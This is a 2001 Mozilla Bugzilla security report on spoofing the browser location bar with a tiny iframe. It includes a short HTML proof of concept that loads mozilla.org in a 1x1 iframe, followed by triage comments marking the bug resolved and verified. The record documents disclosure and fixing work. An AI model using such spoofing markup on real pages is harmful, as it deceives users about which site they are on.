Closed Bug 82800 Opened 23 years ago Closed 23 years ago

Spoofing location using tiny iframe

Tracking

()

Status:

VERIFIED WORKSFORME

People

(Reporter: security-bugs, Assigned: security-bugs)

Details

Mitchell Stoltz (not reading bugmail)

Assignee

Description

•

23 years ago

There is vulnerability at least in build 20010524 which allows spoofing the
location bar
with the help of <iframe> - the iframe's location is displayed in the location bar

---------------------------------------------
<html>
<iframe src="http://www.mozilla.org" width=1 height=1></iframe>
<h1>
This page is spoofed - look at the location bar.
<br>
Written by Georgi Guninski
</h1>
</html>
---------------------------------------------

Georgi Guninski

Bradley Baetz (:bbaetz)

Comment 1

•

23 years ago

Unless I'm missing something, this is bug 82236, isn't it?

Mitchell Stoltz (not reading bugmail)

Assignee

Comment 2

•

23 years ago

Could be a dup of 82236, I'm not quite sure. In any case, this worksforme with a
build from 5/29, and so does 82236 if I'm reading that one right.

Status: NEW → RESOLVED

Closed: 23 years ago

Resolution: --- → WORKSFORME

ckritzer (gone)

Comment 3

•

23 years ago

Marking VERIFIED WORKSFORME on:
-MacOS91 2001-06-01-08-trunk
-Win98SE 2001-06-01-06-trunk
-LinRH62 2001-06-01-08-trunk

Status: RESOLVED → VERIFIED

Mitchell Stoltz (not reading bugmail)

Assignee

Comment 4

•

23 years ago

Removing NS_Confidential flag.

Group: netscapeconfidential?

You need to log in before you can comment on or make changes to this bug.

Bugzilla

Quick Search

Spoofing location using tiny iframe

Categories

(Core :: Security, defect)

Tracking

()

People

(Reporter: security-bugs, Assigned: security-bugs)

References

Details

Crash Data

Security

(public)

User Story

Description

Comment 1

Comment 2

Comment 3

Comment 4